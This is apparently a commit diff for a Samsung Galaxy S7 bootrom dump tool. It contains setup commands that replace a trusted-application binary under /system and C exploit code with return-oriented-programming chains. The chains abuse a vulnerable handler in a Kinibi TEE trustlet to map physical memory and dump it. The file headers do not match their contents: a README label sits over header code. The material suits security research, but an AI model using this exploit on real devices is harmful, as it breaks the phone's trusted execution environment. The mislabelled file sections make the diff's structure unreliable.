update for g930f bootrom dump tool

Author: frederic

G930FXXU1APB4_ffffffffd00000000000000000000004.tlbin

@@ -0,0 +1,22 @@
+# [Exynos BootROM dump tool](https://github.com/frederic/exynos-bootrom-dump)
+
+# [announce](https://fredericb.info)
+
+# target
+Samsung Galaxy S7 (G930F) - G930FXXU2DRD1 - root/SU enabled
+
+# setup
+```
+$ adb pull /system/vendor/lib/libMcClient.so .
+$ adb pull /system/app/mcRegistry/ffffffffd00000000000000000000004.tlbin ffffffffd00000000000000000000004.tlbin.backup
+$ adb push ./G930FXXU1DQAN_fffffffff0000000000000000000001b.tlbin /data/local/tmp/
+$ adb push ./G930FXXU1APB4_ffffffffd00000000000000000000004.tlbin /data/local/tmp/
+$ adb shell "su -c mount -o rw,remount /system"
+$ adb shell "su cp /data/local/tmp/G930FXXU1APB4_ffffffffd00000000000000000000004.tlbin /system/app/mcRegistry/ffffffffd00000000000000000000004.tlbin"
+$ adb shell "su -c mount -o ro,remount /system"
+```
+# build
+```
+$ ~/tools/android/android-ndk-r20/toolchains/llvm/prebuilt/linux-x86_64/bin/armv7a-linux-androideabi21-clang ./g930f_dump-bootrom.c -L./ -lMcClient -o g930f_dump-bootrom
+$ adb push ./g930f_dump-bootrom /data/local/tmp/
+```

G930FXXU1DQAN_fffffffff0000000000000000000001b.tlbin

@@ -1,4 +1,5 @@
 // forked from https://www.synacktiv.com/posts/exploit/kinibi-tee-trusted-application-exploitation.html
+// to https://github.com/frederic/exynos-bootrom-dump
 
 #include <stdio.h>
 #include <stdlib.h>
@@ -12,30 +13,53 @@
 #define info(f_, ...) {printf("[\033[34;1m-\033[0m] "); printf(f_, ##__VA_ARGS__);}
 #define warn(f_, ...) {printf("[\033[33;1mw\033[0m] "); printf(f_, ##__VA_ARGS__);}
 
+void printArray(unsigned char buf[], unsigned int n) {
+	int i;
+	for (i = 0; i < n; i++)
+	{
+		printf("%02X", buf[i]);
+	}
+	printf("\n");
+}
+
 int main(int argc, char **argv) {
     mcResult_t ret;
     mcSessionHandle_t session = {0};
     mcBulkMap_t map;
     uint32_t stack_size;
     char *to_map;
 
+    if(argc != 2) {
+        printf("Usage: %s <offset>\n", argv[0]);
+        exit(1);
+    }
+
+    uint32_t offset = strtoul(argv[1], NULL, 16);
 
     // ROPgadget --binary fffffffff0000000000000000000001b.tlbin \
     //             --rawArch arm --rawMode thumb --offset 0x1000
-    uint32_t rop_chain[] = {
-        0x38c2 + 1, // pop {r0, r1, r2, r3, r4, r5, r6, pc}
-        0x0,        // r0 (will be the string to print)
-        0x0,        // r1 (argument, will be set after mcMap)
-        0x0,        // r2 (not used)
+    uint32_t rop_chain[0x300] = {
+        0x39dc + 1, // pop {r0, r1, r2, r3, r4, r5, r6, pc}
+        0x8,        // r0 tlApi_callDriver=0x8
+        0x40002,    // r1 driverId
+        0xdf0f8,    // r2 params address on the stack
         0x0,        // r3 (not used)
         0x0,        // r4 (not used)
         0x0,        // r5 (not used)
         0x0,        // r6 (not used)
-        0x25070 + 1 // tlApiPrintf wrapper
+        0x07d01008,  //  tlApiLibEntry
+//@0xdf0f8:
+        0xf,//handler ID
+        0x0,//SPID
+        0xdf104,//params on the stack
+//@0xdf104:
+        0x0,
+        0x0,
+        0x0,
     };
 
     FILE *f = fopen(
-        "/data/local/tmp/fffffffff0000000000000000000001b.tlbin",
+        "/data/local/tmp/G930FXXU1DQAN_fffffffff0000000000000000000001b.tlbin",//sha1: 3f2a62d5ba8113be2dd1287234ae04a3188733ea
         "rb"
     );
     if(!f) {
@@ -63,7 +87,7 @@ int main(int argc, char **argv) {
         return 1;
     }
 
-    to_map = strdup("--> Hello from the trusted application <--\n");
+    to_map = malloc(0x1000);
 
     ret = mcOpenTrustlet(&session, 0, ta_mem, ta_size, 
                          (uint8_t *)tci, tciLen);
@@ -75,17 +99,69 @@ int main(int argc, char **argv) {
             err("Can't map in\n");
             return 1;
         }
-        ok("Address in TA virtual memory : 0x%x\n", map.sVirtualAddr);
-
-        // rop_chain[1] is R0, point it to the string in TA 
-        // address space.
-        rop_chain[1] = map.sVirtualAddr;
-
-        stack_size  = 0x54c; // fill stack frame
+        ok("Address in TA virtual memory : 0x%x (0x%x bytes)\n", map.sVirtualAddr, map.sVirtualLen);
+
+        uint32_t rop_chain_dr[] = {
+        0x18f22+1, // pc => @gadget0:    pop.w      { r1, r2, r3, r4, r5, r6, r7, r8, r9, r10, r11, pc }
+        0x0, // r1 (overwritten)
+        0x0 + offset,// r2 => @startPhys0
+        0x0, // r3 => @startPhys1
+        0x0, // r4 (overwritten)
+        0x0, // r5
+        0x0, // r6 (overwritten)
+        0x0, // r7
+        0x0, // r8
+        0x0, // r9
+        0x0, // r10
+        0x0, // r11
+        0x123a0+1, // pc => @gadget1:   pop        { r0, r1, r4, r6, pc }
+        0x80000 + offset, // r0 => @@startVirt
+        0x0, // r1 / param_2 (overwritten with 0x1000) => mapSize
+        0x0, // r4
+        0x0, // r6
+        0x1254c + 1, // pc => @gadget2: MapPhys64 + 2 (skip push)
+        //              00012558 08 bd           pop        { r3, pc }
+        0x0, // (overwritten) => param_2
+        0x1bbd0 + 1, // pop        { r1, r2, r6, pc }
+        0x9, // param_2 => attr, r1
+        0x123a0 + 1,// r2, pc => @gadget4: pop        { r0, r1, r4, r6, pc }
+        0x0, // r6
+        0x19ecc + 1, // pc => pop.w      { r4, r5, r6, lr } ; mov        r0,#0x0 ; bx         r2
+        0x0, // r4
+        0x0, // r5
+        0x0, // r6
+        0x18f22 + 1, // lr =>  pop.w      { r1, r2, r3, r4, r5, r6, r7, r8, r9, r10, r11, pc }
+        map.sVirtualAddr, // r0 : TA virt addr
+        0x0, // r1
+        0x0, // r4
+        0x0, // r6
+        0x12490 + 1, // pc => drApiAddrTranslateAndCheck
+        0x80000 + offset,// r1
+        0x1000,// r2 =>memcpy size
+        0x0,// r3
+        0x0,// r4
+        0x0,// r5
+        0x0, // r6
+        0x0, // r7
+        0x0, // r8
+        0x0, // r9
+        0x0, // r10
+        0x0, // r11
+        0xdc38 + 1, // pc =>  memcpy (thumb=0) // END
+        0x0,
+        0xc682 + 1, //pc => Back to DriverHandler to exit without crash
+        0xc1c0, //r0 : "VALIDATOR [WARN ]: SPID - 0x%08X 0x%08X"
+        };
+
+        rop_chain[0x8c] = 0x13c + sizeof(rop_chain_dr);//memcpy size
+
+        memcpy(&rop_chain[0x9b], rop_chain_dr, sizeof(rop_chain_dr));
+
+        stack_size  = 0xD0;  // fill stack frame
         stack_size += 0x20;  // popped registers size
 
         // fill tciBuffer
-        tci[0] = 27;                             // cmd id
+        tci[0] = 27;                             // cmd id in TA for vulnerable handler
         tci[3] = stack_size + sizeof(rop_chain); // memcpy size
         memcpy(&tci[4 + stack_size/4], &rop_chain, sizeof(rop_chain));
 
@@ -95,5 +171,13 @@ int main(int argc, char **argv) {
         mcCloseSession(&session);
     }
     mcCloseDevice(MC_DEVICE_ID_DEFAULT);
+
+    char fdout_name[32];
+    snprintf(fdout_name, sizeof(fdout_name), "dump_0x%x.bin", offset);
+    FILE* fdout = fopen(fdout_name, "wb");
+    printf("Dumped to file %s\n", fdout_name);
+    fwrite(to_map, 1, 0x1000, fdout);
+    fclose(fdout);
+    printArray(to_map, 0x1000);
     return 0;
-}
+}

MobiCoreDriverApi.h

@@ -0,0 +1,67 @@
+/*
+ * Copyright (c) 2013-2015 TRUSTONIC LIMITED
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright notice,
+ *    this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ *
+ * 3. Neither the name of the TRUSTONIC LIMITED nor the names of its
+ *    contributors may be used to endorse or promote products derived from
+ *    this software without specific prior written permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+ * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
+ * TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
+ * CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
+ * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
+ * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
+ * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
+ * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
+ * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
+ * ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+ */
+
+#ifndef MC_SPID_H_
+#define MC_SPID_H_
+
+#ifdef WIN32
+#define _UNUSED
+#else
+#define _UNUSED __attribute__((unused))
+#endif
+
+/** Service provider Identifier type. */
+typedef uint32_t mcSpid_t;
+
+/** SPID value used as free marker in root containers. */
+static _UNUSED const mcSpid_t MC_SPID_FREE = 0xFFFFFFFF;
+
+/** Reserved SPID value. */
+static _UNUSED const mcSpid_t MC_SPID_RESERVED = 0;
+
+/** SPID for system applications. */
+static _UNUSED const mcSpid_t MC_SPID_SYSTEM = 0xFFFFFFFE;
+
+/** SPID reserved for tests only */
+static _UNUSED const mcSpid_t MC_SPID_RESERVED_TEST = 0xFFFFFFFD;
+static _UNUSED const mcSpid_t MC_SPID_TRUSTONIC_TEST = 0x4;
+
+/** SPID reserved for OTA development */
+static _UNUSED const mcSpid_t MC_SPID_TRUSTONIC_OTA = 0x2A;
+
+/** GP TAs - stored in the trusted storage. They all share the same */
+static _UNUSED const mcSpid_t MC_SPID_GP = 0xFFFFFFFC;
+
+/** RTM's SPID */
+static _UNUSED const mcSpid_t MC_SPID_RTM = 0xFFFFFFFB;
+
+#endif // MC_SPID_H_
+

README.md

@@ -0,0 +1,92 @@
+/*
+ * Copyright (c) 2013-2015 TRUSTONIC LIMITED
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright notice,
+ *    this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ *
+ * 3. Neither the name of the TRUSTONIC LIMITED nor the names of its
+ *    contributors may be used to endorse or promote products derived from
+ *    this software without specific prior written permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+ * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
+ * TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
+ * CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
+ * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
+ * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
+ * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
+ * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
+ * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
+ * ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+ */
+
+#ifndef MC_UUID_H_
+#define MC_UUID_H_
+
+#ifdef WIN32
+#define _UNUSED
+#else
+#define _UNUSED __attribute__((unused))
+#endif
+
+#define UUID_TYPE
+
+#define UUID_LENGTH 16
+/** Universally Unique Identifier (UUID) according to ISO/IEC 11578. */
+typedef struct {
+    uint8_t value[UUID_LENGTH]; /**< Value of the UUID. */
+} mcUuid_t, *mcUuid_ptr;
+
+/** UUID value used as free marker in service provider containers. */
+#define MC_UUID_FREE_DEFINE \
+    { 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, \
+      0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF }
+
+static _UNUSED const mcUuid_t MC_UUID_FREE = {
+    MC_UUID_FREE_DEFINE
+};
+
+/** Reserved UUID. */
+#define MC_UUID_RESERVED_DEFINE \
+    { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }
+
+static _UNUSED const mcUuid_t MC_UUID_RESERVED = {
+    MC_UUID_RESERVED_DEFINE
+};
+
+/** UUID for system applications. */
+#define MC_UUID_SYSTEM_DEFINE \
+    { 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, \
+      0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFE }
+
+static _UNUSED const mcUuid_t MC_UUID_SYSTEM = {
+    MC_UUID_SYSTEM_DEFINE
+};
+
+#define MC_UUID_RTM_DEFINE \
+    { 0x12, 0x34, 0x12, 0x34, 0x12, 0x34, 0x12, 0x34,       \
+      0x12, 0x34, 0x12, 0x34, 0x12, 0x34, 0x12, 0x34 }
+
+static _UNUSED const mcUuid_t MC_UUID_RTM = {
+    MC_UUID_RTM_DEFINE
+};
+
+/**
+ * TODO: Replace with v5 UUID (milestone #3)
+ */
+#define LTA_UUID_DEFINE \
+    { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,         \
+      0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11}
+
+#endif // MC_UUID_H_
+